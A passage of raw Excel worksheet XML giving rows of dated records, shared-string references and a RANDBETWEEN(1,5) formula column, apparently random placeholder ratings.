        <v>14698</v>
      </c>
      <c r="F16328">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16329" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16329" s="1">
        <v>43203.232476851852</v>
      </c>
      <c r="C16329" t="s">
        <v>65</v>
      </c>
      <c r="D16329" t="s">
        <v>312</v>
      </c>
      <c r="E16329" s="2" t="s">
        <v>14699</v>
      </c>
      <c r="F16329">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16330" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16330" s="1">
        <v>43203.19803240741</v>
      </c>
      <c r="C16330" t="s">
        <v>1510</v>
      </c>
      <c r="D16330" t="s">
        <v>367</v>
      </c>
      <c r="E16330" s="2" t="s">
        <v>14700</v>
      </c>
      <c r="F16330">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16331" s="1">
        <v>43203.152731481481</v>
      </c>
      <c r="C16331" t="s">
        <v>48</v>
      </c>
      <c r="E16331" t="s">
        <v>14701</v>
      </c>
      <c r="F16331">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16332" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16332" s="1">
        <v>43203.133159722223</v>
      </c>
      <c r="C16332" t="s">
        <v>9609</v>
      </c>
      <c r="D16332" t="s">
        <v>56</v>
      </c>
      <c r="E16332" s="2" t="s">
        <v>14702</v>
      </c>
      <c r="F16332">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16333" s="1">
        <v>43203.106979166667</v>
      </c>
      <c r="C16333" t="s">
        <v>845</v>
      </c>
      <c r="E16333" t="s">
        <v>14703</v>
      </c>
      <c r="F16333">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16334" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16334" s="1">
        <v>43203.051493055558</v>
      </c>
      <c r="C16334" t="s">
        <v>563</v>
      </c>
      <c r="E16334" s="2" t="s">
        <v>14704</v>
      </c>
      <c r="F16334">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16335" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16335" s="1">
        <v>43203.031261574077</v>
      </c>
      <c r="C16335" t="s">
        <v>542</v>
      </c>
      <c r="D16335" t="s">
        <v>330</v>
      </c>
      <c r="E16335" s="2" t="s">
        <v>14705</v>
      </c>
      <c r="F16335">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16336" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A16336" s="1">
        <v>43202.994849537034</v>
      </c>
      <c r="C16336" t="s">
        <v>220</v>
      </c>
      <c r="D16336" t="s">
        <v>92</v>
      </c>
      <c r="E16336" s="2" t="s">
        <v>14681</v>
      </c>
      <c r="F16336">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16337" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A16337" s="1">
        <v>43202.915891203702</v>
      </c>
      <c r="C16337" t="s">
        <v>4852</v>
      </c>
      <c r="D16337" t="s">
        <v>86</v>
      </c>
      <c r="E16337" s="2" t="s">
        <v>14706</v>
      </c>
      <c r="F16337">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16338" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16338" s="1">
        <v>43202.883587962962</v>
      </c>
      <c r="C16338" t="s">
        <v>173</v>
      </c>
      <c r="D16338" t="s">
        <v>94</v>
      </c>
      <c r="E16338" s="2" t="s">
        <v>14707</v>
      </c>
      <c r="F16338">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16339" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16339" s="1">
        <v>43202.860138888886</v>
      </c>
      <c r="C16339" t="s">
        <v>1130</v>
      </c>
      <c r="D16339" t="s">
        <v>480</v>
      </c>
      <c r="E16339" s="2" t="s">
        <v>14708</v>
      </c>
      <c r="F16339">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16340" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16340" s="1">
        <v>43202.849803240744</v>
      </c>
      <c r="C16340" t="s">
        <v>4508</v>
      </c>
      <c r="D16340" t="s">
        <v>56</v>
      </c>
      <c r="E16340" s="2" t="s">
        <v>14709</v>
      </c>
      <c r="F16340">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16341" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16341" s="1">
        <v>43202.838495370372</v>
      </c>
      <c r="C16341" t="s">
        <v>10088</v>
      </c>
      <c r="D16341" t="s">
        <v>232</v>
      </c>
      <c r="E16341" s="2" t="s">
        <v>14710</v>
      </c>
      <c r="F16341">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16342" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16342" s="1">
        <v>43202.77207175926</v>
      </c>
      <c r="C16342" t="s">
        <v>140</v>
      </c>
      <c r="D16342" t="s">
        <v>234</v>
      </c>
      <c r="E16342" t="s">
        <v>14711</v>
      </c>
      <c r="F16342">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16343" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16343" s="1">
        <v>43202.72488425926</v>
      </c>
      <c r="C16343" t="s">
        <v>6</v>
      </c>
      <c r="D16343" t="s">
        <v>821</v>
      </c>
      <c r="E16343" t="s">
        <v>14712</v>
      </c>
      <c r="F16343">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16344" s="1">
        <v>43202.703587962962</v>
      </c>
      <c r="C16344" t="s">
        <v>71</v>
      </c>
      <c r="E16344" t="s">
        <v>14713</v>
      </c>
      <c r="F16344">
        <f t="shared" ca="1" si="255"/>
        <v>3</v>
      </c>
    </row>
    <row r="16345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16345" s="1">
        <v>43202.702245370368</v>
      </c>
      <c r="C16345" t="s">
        <v>10</v>
      </c>
      <c r="D16345" t="s">
        <v>36</v>
      </c>
      <c r="E16345" t="s">
        <v>14714</v>
      </c>
      <c r="F16345">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16346" s="1">
        <v>43202.683275462965</v>
      </c>
      <c r="C16346" t="s">
        <v>10</v>
      </c>
      <c r="D16346" t="s">
        <v>20</v>
      </c>
      <c r="E16346" t="s">
        <v>14715</v>
      </c>
      <c r="F16346">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16347" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16347" s="1">
        <v>43202.671458333331</v>
      </c>
      <c r="C16347" t="s">
        <v>10</v>
      </c>
      <c r="D16347" t="s">
        <v>178</v>
      </c>
      <c r="E16347" s="2" t="s">
        <v>14716</v>
      </c>
      <c r="F16347">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16348" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16348" s="1">
        <v>43202.643738425926</v>
      </c>
      <c r="C16348" t="s">
        <v>430</v>
      </c>
      <c r="D16348" t="s">
        <v>107</v>
      </c>
      <c r="E16348" s="2" t="s">
        <v>14717</v>
      </c>
      <c r="F16348">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16349" s="1">
        <v>43202.639108796298</v>
      </c>
      <c r="C16349" t="s">
        <v>10</v>
      </c>
      <c r="D16349" t="s">
        <v>6</v>
      </c>
      <c r="F16349">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16350" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A16350" s="1">
        <v>43202.623703703706</v>
      </c>
      <c r="C16350" t="s">
        <v>497</v>
      </c>
      <c r="D16350" t="s">
        <v>374</v>
      </c>
      <c r="E16350" s="2" t="s">
        <v>14718</v>
      </c>
      <c r="F16350">
        <f t="shared" ca="1" si="255"/>
        <v>3</v>
      </c>
    </row>
    <row r="16351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16351" s="1">
        <v>43202.61681712963</v>
      </c>
      <c r="C16351" t="s">
        <v>10</v>
      </c>
      <c r="D16351" t="s">
        <v>89</v>
      </c>
      <c r="E16351" t="s">
        <v>14719</v>
      </c>
      <c r="F16351">
        <f t="shared" ca="1" si="255"/>
        <v>3</v>
      </c>
    </row>
    <row r="16352" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A16352" s="1">
        <v>43202.608969907407</v>
      </c>
      <c r="C16352" t="s">
        <v>6</v>
      </c>
      <c r="D16352" t="s">
        <v>25</v>
      </c>
      <c r="E16352" s="2" t="s">
        <v>14720</v>
      </c>
      <c r="F16352">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16353" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16353" s="1">
        <v>43202.593263888892</v>
      </c>
      <c r="C16353" t="s">
        <v>139</v>
      </c>
      <c r="D16353" t="s">
        <v>14</v>
      </c>
      <c r="E16353" s="2" t="s">
        <v>14721</v>
      </c>
      <c r="F16353">
        <f t="shared" ca="1" si="255"/>
        <v>3</v>
      </c>
    </row>
    <row r="16354" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16354" s="1">
        <v>43202.573587962965</v>
      </c>
      <c r="C16354" t="s">
        <v>73</v>
      </c>
      <c r="D16354" t="s">
        <v>20</v>
      </c>
      <c r="E16354" s="2" t="s">
        <v>14722</v>
      </c>
      <c r="F16354">
        <f t="shared" ca="1" si="255"/>
        <v>3</v>
      </c>
    </row>
    <row r="16355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16355" s="1">
        <v>43202.564571759256</v>
      </c>
      <c r="C16355" t="s">
        <v>10</v>
      </c>
      <c r="D16355" t="s">
        <v>112</v>
      </c>
      <c r="E16355" t="s">
        <v>14723</v>
      </c>
      <c r="F16355">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16356" s="1">
        <v>43202.564155092594</v>
      </c>
      <c r="C16356" t="s">
        <v>6</v>
      </c>
      <c r="D16356" t="s">
        <v>330</v>
      </c>
      <c r="E16356" t="s">
        <v>14724</v>
      </c>
      <c r="F16356">
        <f t="shared" ca="1" si="255"/>
        <v>3</v>
      </c>
    </row>
    <row r="16357" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16357" s="1">
        <v>43202.560555555552</v>
      </c>
      <c r="C16357" t="s">
        <v>6</v>
      </c>
      <c r="D16357" t="s">
        <v>114</v>
      </c>
      <c r="E16357" t="s">
        <v>14725</v>
      </c>
      <c r="F16357">
        <f t="shared" ca="1" si="255"/>
        <v>3</v>
      </c>
    </row>
    <row r="16358" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16358" s="1">
        <v>43202.54650462963</v>
      </c>
      <c r="C16358" t="s">
        <v>10</v>
      </c>
      <c r="D16358" t="s">
        <v>178</v>
      </c>
      <c r="E16358" s="2" t="s">
        <v>14726</v>
      </c>
      <c r="F16358">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16359" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16359" s="1">
        <v>43202.546203703707</v>
      </c>
      <c r="C16359" t="s">
        <v>231</v>
      </c>
      <c r="E16359" t="s">
        <v>14727</v>
      </c>
      <c r="F16359">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16360" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16360" s="1">
        <v>43202.535752314812</v>
      </c>
      <c r="C16360" t="s">
        <v>9609</v>
      </c>
      <c r="D16360" t="s">
        <v>94</v>
      </c>
      <c r="E16360" s="2" t="s">
        <v>14728</v>
      </c>
      <c r="F16360">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16361" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16361" s="1">
        <v>43202.532407407409</v>
      </c>
      <c r="C16361" t="s">
        <v>10</v>
      </c>
      <c r="D16361" t="s">
        <v>192</v>
      </c>
      <c r="E16361" t="s">
        <v>14729</v>
      </c>
      <c r="F16361">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16362" s="1">
        <v>43202.523344907408</v>
      </c>
      <c r="C16362" t="s">
        <v>10</v>
      </c>
      <c r="D16362" t="s">
        <v>163</v>
      </c>
      <c r="E16362" t="s">
        <v>14730</v>
      </c>
      <c r="F16362">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16363" s="1">
        <v>43202.515462962961</v>
      </c>
      <c r="C16363" t="s">
        <v>10</v>
      </c>
      <c r="D16363" t="s">
        <v>1091</v>
      </c>
      <c r="E16363" t="s">
        <v>14731</v>
      </c>
      <c r="F16363">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16364" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16364" s="1">
        <v>43202.507303240738</v>
      </c>
      <c r="C16364" t="s">
        <v>6</v>
      </c>
      <c r="D16364" t="s">
        <v>114</v>
      </c>
      <c r="E16364" t="s">
        <v>14732</v>
      </c>
      <c r="F16364">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16365" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16365" s="1">
        <v>43202.490057870367</v>
      </c>
      <c r="C16365" t="s">
        <v>71</v>
      </c>
      <c r="D16365" t="s">
        <v>312</v>
      </c>
      <c r="E16365" t="s">
        <v>14733</v>
      </c>
      <c r="F16365">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16366" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A16366" s="1">
        <v>43202.478796296295</v>
      </c>
      <c r="C16366" t="s">
        <v>836</v>
      </c>
      <c r="E16366" s="2" t="s">
        <v>14734</v>
      </c>
      <c r="F16366">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16367" s="1">
        <v>43202.469270833331</v>
      </c>
      <c r="C16367" t="s">
        <v>48</v>
      </c>
      <c r="E16367" t="s">
        <v>14735</v>
      </c>
      <c r="F16367">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16368" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A16368" s="1">
        <v>43202.466828703706</v>
      </c>
      <c r="C16368" t="s">
        <v>124</v>
      </c>
      <c r="E16368" s="2" t="s">
        <v>14736</v>
      </c>
      <c r="F16368">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16369" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16369" s="1">
        <v>43202.453425925924</v>
      </c>
      <c r="C16369" t="s">
        <v>71</v>
      </c>
      <c r="E16369" s="2" t="s">
        <v>14737</v>
      </c>
      <c r="F16369">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16370" s="1">
        <v>43202.431793981479</v>
      </c>
      <c r="C16370" t="s">
        <v>10</v>
      </c>
      <c r="D16370" t="s">
        <v>163</v>
      </c>
      <c r="E16370" t="s">
        <v>14738</v>
      </c>
      <c r="F16370">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16371" s="1">
        <v>43202.402395833335</v>
      </c>
      <c r="C16371" t="s">
        <v>318</v>
      </c>
      <c r="F16371">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16372" s="1">
        <v>43202.401539351849</v>
      </c>
      <c r="C16372" t="s">
        <v>6</v>
      </c>
      <c r="D16372" t="s">
        <v>194</v>
      </c>
      <c r="E16372" t="s">
        <v>14739</v>
      </c>
      <c r="F16372">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16373" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16373" s="1">
        <v>43202.390277777777</v>
      </c>
      <c r="C16373" t="s">
        <v>339</v>
      </c>
      <c r="F16373">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16374" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A16374" s="1">
        <v>43202.389363425929</v>
      </c>
      <c r="C16374" t="s">
        <v>48</v>
      </c>
      <c r="E16374" s="2" t="s">
        <v>14740</v>
      </c>
      <c r="F16374">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16375" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A16375" s="1">
        <v>43202.383900462963</v>
      </c>
      <c r="C16375" t="s">
        <v>140</v>
      </c>
      <c r="D16375" t="s">
        <v>141</v>
      </c>
      <c r="E16375" s="2" t="s">
        <v>14741</v>
      </c>
      <c r="F16375">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16376" s="1">
        <v>43202.356539351851</v>
      </c>
      <c r="C16376" t="s">
        <v>10</v>
      </c>
      <c r="D16376" t="s">
        <v>163</v>
      </c>
      <c r="E16376" t="s">
        <v>14742</v>
      </c>
      <c r="F16376">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16377" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16377" s="1">
        <v>43202.343738425923</v>
      </c>
      <c r="C16377" t="s">
        <v>48</v>
      </c>
      <c r="E16377" s="2" t="s">
        <v>14743</v>
      </c>
      <c r="F16377">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16378" s="1">
        <v>43202.340150462966</v>
      </c>
      <c r="C16378" t="s">
        <v>41</v>
      </c>
      <c r="E16378" t="s">
        <v>1446</v>
      </c>
      <c r="F16378">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16379" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16379" s="1">
        <v>43202.336712962962</v>
      </c>
      <c r="C16379" t="s">
        <v>1611</v>
      </c>
      <c r="D16379" t="s">
        <v>89</v>
      </c>
      <c r="E16379" s="2" t="s">
        <v>14744</v>
      </c>
      <c r="F16379">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16380" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16380" s="1">
        <v>43202.328240740739</v>
      </c>
      <c r="C16380" t="s">
        <v>189</v>
      </c>
      <c r="E16380" s="2" t="s">
        <v>14745</v>
      </c>
      <c r="F16380">
        <f t="shared" ca="1" si="255"/>
        <v>1</v>
      </c>
    </row>
    <row r="16381" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A16381" s="1">
        <v>43202.322488425925</v>
      </c>
      <c r="C16381" t="s">
        <v>776</v>
      </c>
      <c r="E16381" s="2" t="s">
        <v>14746</v>
      </c>
      <c r="F16381">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16382" s="1">
        <v>43202.320335648146</v>
      </c>
      <c r="C16382" t="s">
        <v>41</v>
      </c>
      <c r="D16382" t="s">
        <v>312</v>
      </c>
      <c r="E16382" t="s">
        <v>14747</v>
      </c>
      <c r="F16382">
        <f t="shared" ca="1" si="255"/>
        <v>4</v>
      </c>
    </row>
    <row r="16383" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16383" s="1">
        <v>43202.297418981485</v>
      </c>
      <c r="C16383" t="s">
        <v>50</v>
      </c>
      <c r="E16383" s="2" t="s">
        <v>14748</v>
      </c>
      <c r="F16383">
        <f t="shared" ca="1" si="255"/>
        <v>3</v>
      </c>
    </row>
    <row r="16384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16384" s="1">
        <v>43202.29173611111</v>
      </c>
      <c r="C16384" t="s">
        <v>352</v>
      </c>
      <c r="D16384" t="s">
        <v>163</v>
      </c>
      <c r="E16384" t="s">
        <v>14749</v>
      </c>
      <c r="F16384">
        <f t="shared" ca="1" si="255"/>
        <v>2</v>
      </c>
    </row>
    <row r="16385" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16385" s="1">
        <v>43202.287835648145</v>
      </c>
      <c r="C16385" t="s">
        <v>173</v>
      </c>
      <c r="D16385" t="s">
        <v>92</v>
      </c>
      <c r="E16385" s="2" t="s">
        <v>14750</v>
      </c>
      <c r="F16385">
        <f t="shared" ca="1" si="255"/>
        <v>5</v>
      </c>
    </row>
    <row r="16386" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16386" s="1">
        <v>43202.278553240743</v>
      </c>
      <c r="C16386" t="s">
        <v>173</v>
      </c>
      <c r="D16386" t="s">
        <v>1091</v>
      </c>
      <c r="E16386" s="2" t="s">
        <v>14751</v>
      </c>
      <c r="F16386">
        <f t="shared" ref="F16386:F16449" ca="1" si="256">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="16387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16387" s="1">
        <v>43202.275393518517</v>
      </c>
      <c r="C16387" t="s">
        <v>41</v>
      </c>
      <c r="E16387" t="s">
        <v>14752</v>
      </c>
      <c r="F16387">
        <f t="shared" ca="1" si="256"/>
        <v>4</v>
      </c>
    </row>
    <row r="16388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16388" s="1">
        <v>43202.242627314816</v>
      </c>
      <c r="C16388" t="s">
        <v>253</v>
      </c>
      <c r="D16388" t="s">
        <v>312</v>
      </c>
      <c r="E16388" t="s">
        <v>14753</v>
      </c>
      <c r="F16388">
        <f t="shared" ca="1" si="256"/>
        <v>4</v>
      </c>
    </row>
    <row r="16389" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A16389" s="1">
        <v>43202.237581018519</v>
      </c>
      <c r="C16389" t="s">
        <v>48</v>
      </c>
      <c r="E16389" s="2" t="s">
        <v>14754</v>
      </c>
      <c r="F16389">
        <f t="shared" ca="1" si="256"/>
        <v>5</v>
      </c>
    </row>
    <row r="16390" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16390" s="1">
        <v>43202.23233796296</v>
      </c>
      <c r="C16390" t="s">
        <v>43</v>
      </c>
      <c r="E16390" s="2" t="s">
        <v>14755</v>
      </c>
      <c r="F16390">
        <f t="shared" ca="1" si="256"/>
        <v>2</v>
      </c>
    </row>
    <row r="16391" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A16391" s="1">
        <v>43202.221828703703</v>
      </c>
      <c r="C16391" t="s">
        <v>41</v>
      </c>
      <c r="D16391" t="s">
        <v>312</v>
      </c>
      <c r="E16391" s="2" t="s">
        <v>14756</v>
      </c>
      <c r="F16391">
        <f t="shared" ca="1" si="256"/>
        <v>1</v>
      </c>
    </row>
    <row r="16392" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A16392" s="1">
        <v>43202.220625000002</v>
      </c>
      <c r="C16392" t="s">
        <v>127</v>
      </c>
      <c r="D16392" t="s">
        <v>1993</v>
      </c>
      <c r="E16392" s="2" t="s">
        <v>14757</v>
      </c>
      <c r="F16392">
        <f t="shared" ca="1" si="256"/>
        <v>1</v>
      </c>
    </row>
    <row r="16393" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16393" s="1">
        <v>43202.186805555553</v>
      </c>
      <c r="C16393" t="s">
        <v>14</v>
      </c>
      <c r="D16393" t="s">
        <v>993</v>
      </c>
      <c r="E16393" s="2" t="s">
        <v>14758</v>
      </c>
      <c r="F16393">
        <f t="shared" ca="1" si="256"/>
        <v>1</v>
      </c>
    </row>
    <row r="16394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16394" s="1">
        <v>43202.165173611109</v>
      </c>
      <c r="C16394" t="s">
        <v>7253</v>
      </c>
      <c r="E16394" t="s">
        <v>14759</v>
      </c>
      <c r="F16394">
        <f t="shared" ca="1" si="256"/>
        <v>1</v>
      </c>
    </row>
    <row r="16395" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16395" s="1">
        <v>43202.15315972222</v>
      </c>
      <c r="C16395" t="s">
        <v>73</v>
      </c>
      <c r="E16395" s="2" t="s">
        <v>14760</v>
      </c>
      <c r="F16395">
        <f t="shared" ca="1" si="256"/>
        <v>3</v>
      </c>
    </row>
    <row r="16396" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16396" s="1">
        <v>43202.133993055555</v>
      </c>
      <c r="C16396" t="s">
        <v>9609</v>
      </c>
      <c r="D16396" t="s">
        <v>1056</v>
      </c>
      <c r="E16396" s="2" t="s">
        <v>14761</v>
      </c>
      <c r="F16396">
        <f t="shared" ca="1" si="256"/>
        <v>4</v>
      </c>
    </row>
    <row r="16397" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A16397" s="1">
        <v>43202.095451388886</v>
      </c>
      <c r="C16397" t="s">
        <v>41</v>
      </c>
      <c r="E16397" s="2" t="s">
        <v>14762</v>
      </c>
      <c r="F16397">
        <f t="shared" ca="1" si="256"/>
        <v>2</v>
      </c>
    </row>
    <row r="16398" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16398" s="1">
        <v>43202.087592592594</v>
      </c>
      <c r="C16398" t="s">
        <v>318</v>
      </c>
      <c r="E16398" s="2" t="s">
        <v>14763</v>
      </c>
      <c r="F16398">
        <f t="shared" ca="1" si="256"/>
        <v>1</v>
      </c>
    </row>
    <row r="16399" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16399" s="1">
        <v>43202.06832175926</v>
      </c>
      <c r="C16399" t="s">
        <v>9609</v>
      </c>
      <c r="D16399" t="s">
        <v>1160</v>
      </c>
      <c r="E16399" s="2" t="s">
        <v>14764</v>
      </c>
      <c r="F16399">
        <f t="shared" ca="1" si="256"/>
        <v>3</v>
      </c>
    </row>
    <row r="16400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16400" s="1">
        <v>43202.060810185183</v>
      </c>
      <c r="C16400" t="s">
        <v>559</v>
      </c>
      <c r="E16400" t="s">
        <v>14765</v>
      </c>
      <c r="F16400">
        <f t="shared" ca="1" si="256"/>
        <v>3</v>
      </c>
    </row>
    <row r="16401" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16401" s="1">
        <v>43202.008148148147</v>
      </c>
      <c r="C16401" t="s">
        <v>16</v>
      </c>
      <c r="E16401" s="2" t="s">
        <v>14766</v>
      </c>
      <c r="F16401">
        <f t="shared" ca="1" si="256"/>
        <v>4</v>
      </c>
    </row>
    <row r="16402" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16402" s="1">
        <v>43201.98233796296</v>
      </c>
      <c r="C16402" t="s">
        <v>41</v>
      </c>
      <c r="E16402" t="s">
        <v>14767</v>
      </c>
      <c r="F16402">
        <f t="shared" ca="1" si="256"/>
        <v>4</v>
      </c>
    </row>
    <row r="16403" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16403" s="1">
        <v>43201.97420138889</v>
      </c>
      <c r="C16403" t="s">
        <v>71</v>
      </c>
      <c r="D16403" t="s">
        <v>2214</v>
      </c>
      <c r="E16403" s="2" t="s">
        <v>14768</v>
      </c>
      <c r="F16403">
        <f t="shared" ca="1" si="256"/>
        <v>5</v>
      </c>
    </row>
    <row r="16404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16404" s="1">
        <v>43201.954212962963</v>
      </c>
      <c r="C16404" t="s">
        <v>10</v>
      </c>
      <c r="D16404" t="s">
        <v>80</v>
      </c>
      <c r="E16404" t="s">
        <v>14769</v>
      </c>
      <c r="F16404">
        <f t="shared" ca="1" si="256"/>
        <v>3</v>
      </c>
    </row>
    <row r="16405" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16405" s="1">
        <v>43201.926064814812</v>
      </c>
      <c r="C16405" t="s">
        <v>73</v>
      </c>
      <c r="E16405" s="2" t="s">
        <v>14770</v>
      </c>
      <c r="F16405">
        <f t="shared" ca="1" si="256"/>
        <v>5</v>
      </c>
    </row>
    <row r="16406" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16406" s="1">
